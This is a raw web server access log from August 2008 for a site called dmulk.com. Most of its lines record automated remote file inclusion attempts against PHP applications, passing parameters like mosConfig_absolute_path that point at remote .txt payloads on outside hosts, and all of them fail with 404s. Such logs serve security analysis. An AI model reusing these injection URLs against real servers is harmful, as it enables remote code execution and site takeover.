200.155.18.50 - - [12/Aug/2008:10:41:15 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.155.18.50 - - [12/Aug/2008:10:41:16 -0700] "GET /logs/access_080215.log/akocomments.php?mosConfig_absolute_path=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:41:16 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:41:16 -0700] "GET /logs/access_071225.log//content/multithumb/multithumb?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:41:16 -0700] "GET /logs/access_071225.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:41:24 -0700] "GET /logs/access_071221.log//content/multithumb/multithumb?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:41:24 -0700] "GET /logs/access_071221.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
200.155.18.50 - - [12/Aug/2008:10:41:42 -0700] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.62.66 - - [12/Aug/2008:10:41:46 -0700] "GET /logs/errors.php?error=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [12/Aug/2008:10:41:49 -0700] "GET /errors.php?error=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:41:49 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
205.151.125.66 - - [12/Aug/2008:10:41:51 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:10:42:07 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:10:42:07 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.151.125.66 - - [12/Aug/2008:10:42:29 -0700] "GET //avatar.php?page=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.42.218.66 - - [12/Aug/2008:10:42:30 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.42.218.66 - - [12/Aug/2008:10:42:30 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.42.218.66 - - [12/Aug/2008:10:42:30 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:42:50 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
69.42.218.66 - - [12/Aug/2008:10:42:55 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.240.146 - - [12/Aug/2008:10:43:02 -0700] "GET /logs/access.log/errors.php?error=http://www.wingsart.ru/gstbook/templates/liscence.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [12/Aug/2008:10:43:02 -0700] "GET /errors.php?error=http://www.wingsart.ru/gstbook/templates/liscence.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [12/Aug/2008:10:43:02 -0700] "GET /logs/errors.php?error=http://www.wingsart.ru/gstbook/templates/liscence.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:10:43:16 -0700] "GET /logs/errors.php?error=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:10:43:17 -0700] "GET /errors.php?error=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
67.18.29.218 - - [12/Aug/2008:10:43:24 -0700] "GET //avatar.php?page=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:43:25 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.65.41.92 - - [12/Aug/2008:10:43:27 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:43:28 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:43:50 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:43:54 -0700] "GET /logs//myevent.php?myevent_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:43:54 -0700] "GET //myevent.php?myevent_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:44:27 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:44:28 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:45:33 -0700] "GET /errors.php?error=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.18.29.218 - - [12/Aug/2008:10:45:33 -0700] "GET //avatar.php?page=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:45:33 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:45:35 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.188.110.128 - - [12/Aug/2008:10:45:35 -0700] "GET /logs//avatar.php?page=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:45:37 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:45:38 -0700] "GET /logs/errors.php?error=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:45:39 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:45:42 -0700] "GET /logs/access.log/errors.php?error=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.188.110.128 - - [12/Aug/2008:10:45:49 -0700] "GET //avatar.php?page=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:45:50 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
62.231.161.4 - - [12/Aug/2008:10:46:08 -0700] "GET /logs/access_080313.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:46:08 -0700] "GET /logs/access_080117.log//content/multithumb/multithumb?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:46:08 -0700] "GET /logs/access_080117.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:46:13 -0700] "GET /logs/access_080125.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:46:13 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:46:13 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:46:16 -0700] "GET /logs/access_080125.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:46:16 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:46:16 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.151.125.66 - - [12/Aug/2008:10:46:27 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.151.125.66 - - [12/Aug/2008:10:46:27 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:46:51 -0700] "GET /logs/access_080311.log//content/multithumb/multithumb?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:46:51 -0700] "GET /logs/access_080311.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:46:51 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:47:07 -0700] "GET /logs/errors.php?error=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:47:08 -0700] "GET /errors.php?error=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.55.211.23 - - [12/Aug/2008:10:47:17 -0700] "GET /logs/access_080422.log HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:47:35 -0700] "GET /logs/access_080305.log//content/multithumb/multithumb?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:47:35 -0700] "GET /logs/access_080305.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:47:51 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:48:02 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:48:02 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:48:11 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.97.229.104 - - [12/Aug/2008:10:48:11 -0700] "GET /logs/access_080226.log/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.weblogic.co.bw/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:48:12 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.97.229.104 - - [12/Aug/2008:10:48:12 -0700] "GET /logs/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.weblogic.co.bw/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:48:18 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:48:18 -0700] "GET /logs/access_080222.log//content/multithumb/multithumb?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:48:19 -0700] "GET /logs/access_080222.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:10:48:28 -0700] "GET /logs/access_080315.log/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:10:48:29 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.97.229.104 - - [12/Aug/2008:10:48:31 -0700] "GET /logs/access_080229.log/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.weblogic.co.bw/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:10:48:36 -0700] "GET /logs/access_080315.log/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:10:48:37 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:10:48:49 -0700] "GET /logs/access_080315.log/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:10:49:00 -0700] "GET /logs/access_080315.log/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:10:49:03 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:49:06 -0700] "GET /logs/access_080225.log//content/multithumb/multithumb?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:49:07 -0700] "GET /logs/access_080225.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
65.55.211.30 - - [12/Aug/2008:10:49:08 -0700] "GET /logs/access_080423.log HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.30 - - [12/Aug/2008:10:49:08 -0700] "GET /logs/access_080419.log HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:49:12 -0700] "GET /logs/access_080118.log//content/multithumb/multithumb?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:49:13 -0700] "GET /logs/access_080118.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:49:13 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:49:14 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:49:14 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:49:14 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:10:49:14 -0700] "GET /logs/access_080315.log/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:10:49:15 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:10:49:15 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:49:25 -0700] "GET /logs/myPHPCalendar/admin.php?cal_dir=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:49:26 -0700] "GET /myPHPCalendar/admin.php?cal_dir=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.12.151.24 - - [12/Aug/2008:10:49:36 -0700] "GET /logs/access.log/errors.php?error=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.12.151.24 - - [12/Aug/2008:10:49:36 -0700] "GET /errors.php?error=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.12.151.24 - - [12/Aug/2008:10:49:36 -0700] "GET /logs/errors.php?error=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
74.53.240.146 - - [12/Aug/2008:10:49:41 -0700] "GET /logs/access_080324.log/errors.php?error=http://www.wingsart.ru/gstbook/templates/liscence.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:49:48 -0700] "GET /logs/access_080210.log/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:49:49 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:49:50 -0700] "GET /logs/access_080210.log/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:49:50 -0700] "GET /logs/access_080210.log/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:49:52 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
89.108.67.220 - - [12/Aug/2008:10:49:52 -0700] "GET /logs/access_080207.log/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:49:52 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:49:53 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:49:55 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:49:56 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:49:56 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:49:58 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:49:59 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:50:01 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:50:01 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.104.82 - - [12/Aug/2008:10:50:06 -0700] "GET /logs/errors.php?error=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
